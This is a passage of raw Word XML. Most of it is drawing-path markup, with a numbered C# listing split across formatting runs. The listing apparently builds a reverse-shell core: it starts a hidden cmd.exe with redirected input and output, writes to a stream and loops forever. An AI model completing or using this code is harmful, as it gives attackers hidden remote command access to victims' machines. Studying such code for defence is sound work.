      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="129" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="316" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="4821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22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streamWriter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96c38"/>
          <w:spacing w:val="12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new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StreamWriter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stream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;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23</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="58" w:after="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="422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24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StringBuilder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strInput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new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StringBuilder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(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;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25</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="43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26</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="17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Process</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="2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p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="23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2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new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="23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Process</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898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27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p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StartInfo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="12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FileName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"cmd.exe"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28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p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StartInfo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="12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CreateNoWindow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96c38"/>
          <w:spacing w:val="15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true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29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p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StartInfo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="12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UseShellExecute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96c38"/>
          <w:spacing w:val="16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false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30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p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StartInfo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="12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RedirectStandardOutput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96c38"/>
          <w:spacing w:val="20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true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31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p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StartInfo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="12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RedirectStandardInput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96c38"/>
          <w:spacing w:val="20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true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32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p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StartInfo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="12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RedirectStandardError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96c38"/>
          <w:spacing w:val="20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true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;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="121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33</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t>  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p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OutputDataReceived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96c38"/>
          <w:spacing w:val="15"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+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new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DataReceivedEventHandler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="20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CmdOutputDataHan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3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>dler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;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="156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34</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="23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p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Start</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898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346" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="6742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35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p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BeginOutputReadLine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="14"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(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;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36</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="13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37</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="24"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>while</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898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z w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)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520.111pt;margin-top:0.0pt;width:0.0pt;height:556.505pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,0" coordsize="0,11130">
        <v:shape style="position:absolute;left:10402;top:0;width:0;height:11130" coordorigin="10402,0" coordsize="0,11130" path="m10402,0l10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,1,10402,2,10402,3,10402,4,10402,6,10402,8,10402,11,10402,14,10402,18,10402,22,10402,27,10402,32,10402,38,10402,45,10402,52,10402,61,10402,70,10402,80,10402,91,10402,103,10402,116,10402,130,10402,144,10402,161,10402,178,10402,196,10402,216,10402,237,10402,259,10402,283,10402,308,10402,334,10402,362,10402,391,10402,422,10402,455,10402,489,10402,525,10402,562,10402,601,10402,642,10402,685,10402,730,10402,777,10402,825,10402,876,10402,928,10402,983,10402,1040,10402,1098,10402,1159,10402,1223,10402,1288,10402,1356,10402,1426,10402,1499,10402,1574,10402,1651,10402,1731,10402,1813,10402,1898,10402,1986,10402,2076,10402,2169,10402,2265,10402,2363,10402,2465,10402,2569,10402,2676,10402,2786,10402,2899,10402,3015,10402,3134,10402,3256,10402,3381,10402,3510,10402,3641,10402,3776,10402,3914,10402,4056,10402,4201,10402,4349,10402,4500,10402,4656,10402,4814,10402,4977,10402,5143,10402,5312,10402,5485,10402,5662,10402,5843,10402,6028,10402,6216,10402,6408,10402,6604,10402,6804,10402,7009,10402,7217,10402,7429,10402,7645,10402,7866,10402,8091,10402,8320,10402,8553,10402,8790,10402,9032,10402,9279,10402,9530,10402,9785,10402,10045,10402,10309,10402,10578,10402,10851,10402,11130e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:49.500pt;width:449.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,990" coordsize="8990,370">
        <v:shape style="position:absolute;left:1490;top:990;width:8990;height:370" coordorigin="1490,990" coordsize="8990,370" path="m1510,1000l1510,1000,1510,1000,1510,1000,1510,1000,1510,1000,1510,1000,1511,1000,1512,1000,1512,1000,1514,1000,1515,1000,1517,1000,1519,1000,1521,1000,1524,1000,1528,1000,1532,1000,1536,1000,1541,1000,1546,1000,1552,1000,1559,1000,1566,1000,1575,1000,1583,1000,1593,1000,1603,1000,1615,1000,1627,1000,1640,1000,1654,1000,1668,1000,1684,1000,1701,1000,1719,1000,1738,1000,1758,1000,1780,1000,1802,1000,1826,1000,1851,1000,1877,1000,1904,1000,1933,1000,1963,1000,1995,1000,2028,1000,2063,1000,2099,1000,2136,1000,2175,1000,2216,1000,2259,1000,2303,1000,2348,1000,2396,1000,2445,1000,2496,1000,2549,1000,2604,1000,2660,1000,2719,1000,2779,1000,2841,1000,2906,1000,2972,1000,3041,1000,3112,1000,3184,1000,3259,1000,3336,1000,3416,1000,3498,1000,3582,1000,3668,1000,3757,1000,3848,1000,3941,1000,4037,1000,4136,1000,4236,1000,4340,1000,4446,1000,4555,1000,4666,1000,4780,1000,4897,1000,5017,1000,5139,1000,5264,1000,5392,1000,5523,1000,5657,1000,5793,1000,5933,1000,6076,1000,6222,1000,6370,1000,6522,1000,6677,1000,6835,1000,6997,1000,7161,1000,7329,1000,7500,1000,7675,1000,7853,1000,8034,1000,8219,1000,8407,1000,8598,1000,8793,1000,8992,1000,9194,1000,9400,1000,9609,1000,9823,1000,10039,1000,10260,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1001,10484,1001,10484,1001,10484,1001,10484,1002,10484,1002,10484,1002,10484,1003,10484,1003,10484,1003,10484,1004,10484,1004,10484,1005,10484,1006,10484,1006,10484,1007,10484,1008,10484,1008,10484,1009,10484,1010,10484,1011,10484,1012,10484,1013,10484,1014,10484,1015,10484,1016,10484,1017,10484,1018,10484,1020,10484,1021,10484,1023,10484,1024,10484,1026,10484,1027,10484,1029,10484,1031,10484,1033,10484,1035,10484,1037,10484,1039,10484,1041,10484,1043,10484,1045,10484,1048,10484,1050,10484,1053,10484,1055,10484,1058,10484,1061,10484,1064,10484,1066,10484,1070,10484,1073,10484,1076,10484,1079,10484,1083,10484,1086,10484,1090,10484,1093,10484,1097,10484,1101,10484,1105,10484,1109,10484,1113,10484,1118,10484,1122,10484,1127,10484,1131,10484,1136,10484,1141,10484,1146,10484,1151,10484,1156,10484,1162,10484,1167,10484,1173,10484,1179,10484,1184,10484,1190,10484,1196,10484,1203,10484,1209,10484,1216,10484,1222,10484,1229,10484,1236,10484,1243,10484,1250,10484,1257,10484,1265,10484,1272,10484,1280,10484,1288,10484,1296,10484,1304,10484,1312,10484,1321,10484,1329,10484,1338,10484,1347,10484,1356,10484,1365,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10483,1375,10482,1375,10482,1375,10480,1375,10479,1375,10477,1375,10475,1375,10473,1375,10470,1375,10466,1375,10462,1375,10458,1375,10453,1375,10448,1375,10442,1375,10435,1375,10428,1375,10419,1375,10411,1375,10401,1375,10391,1375,10379,1375,10367,1375,10354,1375,10340,1375,10326,1375,10310,1375,10293,1375,10275,1375,10256,1375,10236,1375,10215,1375,10192,1375,10168,1375,10143,1375,10117,1375,10090,1375,10061,1375,10031,1375,9999,1375,9966,1375,9931,1375,9895,1375,9858,1375,9819,1375,9778,1375,9735,1375,9691,1375,9646,1375,9598,1375,9549,1375,9498,1375,9445,1375,9391,1375,9334,1375,9275,1375,9215,1375,9153,1375,9088,1375,9022,1375,8953,1375,8883,1375,8810,1375,8735,1375,8658,1375,8578,1375,8497,1375,8413,1375,8326,1375,8238,1375,8146,1375,8053,1375,7957,1375,7859,1375,7758,1375,7654,1375,7548,1375,7439,1375,7328,1375,7214,1375,7097,1375,6977,1375,6855,1375,6730,1375,6602,1375,6471,1375,6337,1375,6201,1375,6061,1375,5918,1375,5773,1375,5624,1375,5472,1375,5317,1375,5159,1375,4997,1375,4833,1375,4665,1375,4494,1375,4319,1375,4141,1375,3960,1375,3776,1375,3587,1375,3396,1375,3201,1375,3002,1375,2800,1375,2594,1375,2385,1375,2172,1375,1955,1375,1734,1375,1510,1375,1510,1375,1510,1375,1510,1375,1510,1375,1510,1375,1510,1375,1510,1375,1510,1375,1510,1375,1510,1375,1510,1374,1510,1374,1510,1374,1510,1374,1510,1374,1510,1374,1510,1374,1510,1374,1510,1373,1510,1373,1510,1373,1510,1373,1510,1372,1510,1372,1510,1372,1510,1371,1510,1371,1510,1370,1510,1370,1510,1369,1510,1369,1510,1368,1510,1367,1510,1367,1510,1366,1510,1365,1510,1364,1510,1363,1510,1362,1510,1361,1510,1360,1510,1359,1510,1358,1510,1357,1510,1356,1510,1354,1510,1353,1510,1352,1510,1350,1510,1348,1510,1347,1510,1345,1510,1343,1510,1342,1510,1340,1510,1338,1510,1336,1510,1333,1510,1331,1510,1329,1510,1327,1510,1324,1510,1322,1510,1319,1510,1316,1510,1314,1510,1311,1510,1308,1510,1305,1510,1302,1510,1298,1510,1295,1510,1292,1510,1288,1510,1284,1510,1281,1510,1277,1510,1273,1510,1269,1510,1265,1510,1261,1510,1256,1510,1252,1510,1247,1510,1243,1510,1238,1510,1233,1510,1228,1510,1223,1510,1218,1510,1212,1510,1207,1510,1201,1510,1196,1510,1190,1510,1184,1510,1178,1510,1171,1510,1165,1510,1159,1510,1152,1510,1145,1510,1138,1510,1131,1510,1124,1510,1117,1510,1110,1510,1102,1510,1094,1510,1086,1510,1078,1510,1070,1510,1062,1510,1053,1510,1045,1510,1036,1510,1027,1510,1018,1510,1009,1510,1000e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:49.500pt;width:1.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,990" coordsize="30,390">
        <v:shape style="position:absolute;left:1490;top:990;width:30;height:390" coordorigin="1490,990" coordsize="30,390" path="m1517,1000l1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1001,1517,1001,1517,1001,1517,1001,1517,1002,1517,1002,1517,1002,1517,1003,1517,1003,1517,1003,1517,1004,1517,1004,1517,1005,1517,1006,1517,1006,1517,1007,1517,1008,1517,1008,1517,1009,1517,1010,1517,1011,1517,1012,1517,1013,1517,1014,1517,1015,1517,1016,1517,1017,1517,1018,1517,1020,1517,1021,1517,1023,1517,1024,1517,1026,1517,1027,1517,1029,1517,1031,1517,1033,1517,1035,1517,1037,1517,1039,1517,1041,1517,1043,1517,1045,1517,1048,1517,1050,1517,1053,1517,1055,1517,1058,1517,1061,1517,1064,1517,1066,1517,1070,1517,1073,1517,1076,1517,1079,1517,1083,1517,1086,1517,1090,1517,1093,1517,1097,1517,1101,1517,1105,1517,1109,1517,1113,1517,1118,1517,1122,1517,1127,1517,1131,1517,1136,1517,1141,1517,1146,1517,1151,1517,1156,1517,1162,1517,1167,1517,1173,1517,1179,1517,1184,1517,1190,1517,1196,1517,1203,1517,1209,1517,1216,1517,1222,1517,1229,1517,1236,1517,1243,1517,1250,1517,1257,1517,1265,1517,1272,1517,1280,1517,1288,1517,1296,1517,1304,1517,1312,1517,1321,1517,1329,1517,1338,1517,1347,1517,1356,1517,1365,1517,1375e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:67.500pt;width:449.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1350" coordsize="8990,370">
        <v:shape style="position:absolute;left:1490;top:1350;width:8990;height:370" coordorigin="1490,1350" coordsize="8990,370" path="m1510,1375l1510,1375,1510,1375,1510,1375,1510,1375,1510,1375,1510,1375,1511,1375,1512,1375,1512,1375,1514,1375,1515,1375,1517,1375,1519,1375,1521,1375,1524,1375,1528,1375,1532,1375,1536,1375,1541,1375,1546,1375,1552,1375,1559,1375,1566,1375,1575,1375,1583,1375,1593,1375,1603,1375,1615,1375,1627,1375,1640,1375,1654,1375,1668,1375,1684,1375,1701,1375,1719,1375,1738,1375,1758,1375,1780,1375,1802,1375,1826,1375,1851,1375,1877,1375,1904,1375,1933,1375,1963,1375,1995,1375,2028,1375,2063,1375,2099,1375,2136,1375,2175,1375,2216,1375,2259,1375,2303,1375,2348,1375,2396,1375,2445,1375,2496,1375,2549,1375,2604,1375,2660,1375,2719,1375,2779,1375,2841,1375,2906,1375,2972,1375,3041,1375,3112,1375,3184,1375,3259,1375,3336,1375,3416,1375,3498,1375,3582,1375,3668,1375,3757,1375,3848,1375,3941,1375,4037,1375,4136,1375,4236,1375,4340,1375,4446,1375,4555,1375,4666,1375,4780,1375,4897,1375,5017,1375,5139,1375,5264,1375,5392,1375,5523,1375,5657,1375,5793,1375,5933,1375,6076,1375,6222,1375,6370,1375,6522,1375,6677,1375,6835,1375,6997,1375,7161,1375,7329,1375,7500,1375,7675,1375,7853,1375,8034,1375,8219,1375,8407,1375,8598,1375,8793,1375,8992,1375,9194,1375,9400,1375,9609,1375,9823,1375,10039,1375,10260,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1376,10484,1376,10484,1376,10484,1376,10484,1376,10484,1377,10484,1377,10484,1377,10484,1378,10484,1378,10484,1378,10484,1379,10484,1379,10484,1380,10484,1380,10484,1381,10484,1382,10484,1382,10484,1383,10484,1384,10484,1385,10484,1386,10484,1386,10484,1387,10484,1388,10484,1389,10484,1391,10484,1392,10484,1393,10484,1394,10484,1395,10484,1397,10484,1398,10484,1400,10484,1401,10484,1403,10484,1405,10484,1407,10484,1408,10484,1410,10484,1412,10484,1414,10484,1416,10484,1419,10484,1421,10484,1423,10484,1426,10484,1428,10484,1431,10484,1433,10484,1436,10484,1439,10484,1442,10484,1445,10484,1448,10484,1451,10484,1454,10484,1458,10484,1461,10484,1465,10484,1469,10484,1472,10484,1476,10484,1480,10484,1484,10484,1488,10484,1493,10484,1497,10484,1501,10484,1506,10484,1511,10484,1515,10484,1520,10484,1525,10484,1531,10484,1536,10484,1541,10484,1547,10484,1552,10484,1558,10484,1564,10484,1570,10484,1576,10484,1582,10484,1588,10484,1595,10484,1602,10484,1608,10484,1615,10484,1622,10484,1629,10484,1637,10484,1644,10484,1651,10484,1659,10484,1667,10484,1675,10484,1683,10484,1691,10484,1700,10484,1708,10484,1717,10484,1726,10484,1735,10484,1735,10484,1735,10484,1735,10484,1735,10484,1735,10484,1735,10483,1735,10482,1735,10482,1735,10480,1735,10479,1735,10477,1735,10475,1735,10473,1735,10470,1735,10466,1735,10462,1735,10458,1735,10453,1735,10448,1735,10442,1735,10435,1735,10428,1735,10419,1735,10411,1735,10401,1735,10391,1735,10379,1735,10367,1735,10354,1735,10340,1735,10326,1735,10310,1735,10293,1735,10275,1735,10256,1735,10236,1735,10215,1735,10192,1735,10168,1735,10143,1735,10117,1735,10090,1735,10061,1735,10031,1735,9999,1735,9966,1735,9931,1735,9895,1735,9858,1735,9819,1735,9778,1735,9735,1735,9691,1735,9646,1735,9598,1735,9549,1735,9498,1735,9445,1735,9391,1735,9334,1735,9275,1735,9215,1735,9153,1735,9088,1735,9022,1735,8953,1735,8883,1735,8810,1735,8735,1735,8658,1735,8578,1735,8497,1735,8413,1735,8326,1735,8238,1735,8146,1735,8053,1735,7957,1735,7859,1735,7758,1735,7654,1735,7548,1735,7439,1735,7328,1735,7214,1735,7097,1735,6977,1735,6855,1735,6730,1735,6602,1735,6471,1735,6337,1735,6201,1735,6061,1735,5918,1735,5773,1735,5624,1735,5472,1735,5317,1735,5159,1735,4997,1735,4833,1735,4665,1735,4494,1735,4319,1735,4141,1735,3960,1735,3776,1735,3587,1735,3396,1735,3201,1735,3002,1735,2800,1735,2594,1735,2385,1735,2172,1735,1955,1735,1734,1735,1510,1735,1510,1735,1510,1735,1510,1735,1510,1735,1510,1735,1510,1735,1510,1735,1510,1735,1510,1735,1510,1735,1510,1735,1510,1735,1510,1735,1510,1734,1510,1734,1510,1734,1510,1734,1510,1734,1510,1734,1510,1733,1510,1733,1510,1733,1510,1733,1510,1732,1510,1732,1510,1732,1510,1731,1510,1731,1510,1730,1510,1730,1510,1729,1510,1729,1510,1728,1510,1727,1510,1726,1510,1726,1510,1725,1510,1724,1510,1723,1510,1722,1510,1721,1510,1720,1510,1719,1510,1718,1510,1717,1510,1715,1510,1714,1510,1713,1510,1711,1510,1710,1510,1708,1510,1707,1510,1705,1510,1703,1510,1701,1510,1699,1510,1697,1510,1695,1510,1693,1510,1691,1510,1689,1510,1686,1510,1684,1510,1681,1510,1679,1510,1676,1510,1673,1510,1671,1510,1668,1510,1665,1510,1662,1510,1658,1510,1655,1510,1652,1510,1648,1510,1645,1510,1641,1510,1637,1510,1633,1510,1629,1510,1625,1510,1621,1510,1617,1510,1613,1510,1608,1510,1604,1510,1599,1510,1594,1510,1589,1510,1584,1510,1579,1510,1574,1510,1568,1510,1563,1510,1557,1510,1552,1510,1546,1510,1540,1510,1534,1510,1527,1510,1521,1510,1515,1510,1508,1510,1501,1510,1494,1510,1487,1510,1480,1510,1473,1510,1466,1510,1458,1510,1450,1510,1443,1510,1435,1510,1426,1510,1418,1510,1410,1510,1401,1510,1393,1510,1384,1510,1375e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:68.500pt;width:1.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1370" coordsize="30,370">
        <v:shape style="position:absolute;left:1490;top:1370;width:30;height:370" coordorigin="1490,1370" coordsize="30,370" path="m1517,1375l1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1376,1517,1376,1517,1376,1517,1376,1517,1376,1517,1377,1517,1377,1517,1377,1517,1378,1517,1378,1517,1378,1517,1379,1517,1379,1517,1380,1517,1380,1517,1381,1517,1382,1517,1382,1517,1383,1517,1384,1517,1385,1517,1386,1517,1386,1517,1387,1517,1388,1517,1389,1517,1391,1517,1392,1517,1393,1517,1394,1517,1395,1517,1397,1517,1398,1517,1400,1517,1401,1517,1403,1517,1405,1517,1407,1517,1408,1517,1410,1517,1412,1517,1414,1517,1416,1517,1419,1517,1421,1517,1423,1517,1426,1517,1428,1517,1431,1517,1433,1517,1436,1517,1439,1517,1442,1517,1445,1517,1448,1517,1451,1517,1454,1517,1458,1517,1461,1517,1465,1517,1469,1517,1472,1517,1476,1517,1480,1517,1484,1517,1488,1517,1493,1517,1497,1517,1501,1517,1506,1517,1511,1517,1515,1517,1520,1517,1525,1517,1531,1517,1536,1517,1541,1517,1547,1517,1552,1517,1558,1517,1564,1517,1570,1517,1576,1517,1582,1517,1588,1517,1595,1517,1602,1517,1608,1517,1615,1517,1622,1517,1629,1517,1637,1517,1644,1517,1651,1517,1659,1517,1667,1517,1675,1517,1683,1517,1691,1517,1700,1517,1708,1517,1717,1517,1726,1517,1735e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:85.500pt;width:449.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1710" coordsize="8990,390">
        <v:shape style="position:absolute;left:1490;top:1710;width:8990;height:390" coordorigin="1490,1710" coordsize="8990,390" path="m1510,1735l1510,1735,1510,1735,1510,1735,1510,1735,1510,1735,1510,1735,1511,1735,1512,1735,1512,1735,1514,1735,1515,1735,1517,1735,1519,1735,1521,1735,1524,1735,1528,1735,1532,1735,1536,1735,1541,1735,1546,1735,1552,1735,1559,1735,1566,1735,1575,1735,1583,1735,1593,1735,1603,1735,1615,1735,1627,1735,1640,1735,1654,1735,1668,1735,1684,1735,1701,1735,1719,1735,1738,1735,1758,1735,1780,1735,1802,1735,1826,1735,1851,1735,1877,1735,1904,1735,1933,1735,1963,1735,1995,1735,2028,1735,2063,1735,2099,1735,2136,1735,2175,1735,2216,1735,2259,1735,2303,1735,2348,1735,2396,1735,2445,1735,2496,1735,2549,1735,2604,1735,2660,1735,2719,1735,2779,1735,2841,1735,2906,1735,2972,1735,3041,1735,3112,1735,3184,1735,3259,1735,3336,1735,3416,1735,3498,1735,3582,1735,3668,1735,3757,1735,3848,1735,3941,1735,4037,1735,4136,1735,4236,1735,4340,1735,4446,1735,4555,1735,4666,1735,4780,1735,4897,1735,5017,1735,5139,1735,5264,1735,5392,1735,5523,1735,5657,1735,5793,1735,5933,1735,6076,1735,6222,1735,6370,1735,6522,1735,6677,1735,6835,1735,6997,1735,7161,1735,7329,1735,7500,1735,7675,1735,7853,1735,8034,1735,8219,1735,8407,1735,8598,1735,8793,1735,8992,1735,9194,1735,9400,1735,9609,1735,9823,1735,10039,1735,10260,1735,10484,1735,10484,1735,10484,1735,10484,1735,10484,1735,10484,1735,10484,1735,10484,1735,10484,1735,10484,1735,10484,1735,10484,1735,10484,1735,10484,1735,10484,1735,10484,1735,10484,1736,10484,1736,10484,1736,10484,1736,10484,1736,10484,1737,10484,1737,10484,1737,10484,1738,10484,1738,10484,1738,10484,1739,10484,1739,10484,1740,10484,1740,10484,1741,10484,1742,10484,1742,10484,1743,10484,1744,10484,1744,10484,1745,10484,1746,10484,1747,10484,1748,10484,1749,10484,1750,10484,1751,10484,1753,10484,1754,10484,1755,10484,1757,10484,1758,10484,1759,10484,1761,10484,1763,10484,1764,10484,1766,10484,1768,10484,1770,10484,1772,10484,1774,10484,1776,10484,1778,10484,1781,10484,1783,10484,1785,10484,1788,10484,1791,10484,1793,10484,1796,10484,1799,10484,1802,10484,1805,10484,1808,10484,1811,10484,1815,10484,1818,10484,1821,10484,1825,10484,1829,10484,1833,10484,1837,10484,1841,10484,1845,10484,1849,10484,1853,10484,1858,10484,1862,10484,1867,10484,1872,10484,1876,10484,1881,10484,1887,10484,1892,10484,1897,10484,1903,10484,1908,10484,1914,10484,1920,10484,1926,10484,1932,10484,1938,10484,1944,10484,1951,10484,1958,10484,1964,10484,1971,10484,1978,10484,1985,10484,1993,10484,2000,10484,2008,10484,2015,10484,2023,10484,2031,10484,2039,10484,2048,10484,2056,10484,2065,10484,2073,10484,2082,10484,2091,10484,2101,10484,2110,10484,2110,10484,2110,10484,2110,10484,2110,10484,2110,10484,2110,10483,2110,10482,2110,10482,2110,10480,2110,10479,2110,10477,2110,10475,2110,10473,2110,10470,2110,10466,2110,10462,2110,10458,2110,10453,2110,10448,2110,10442,2110,10435,2110,1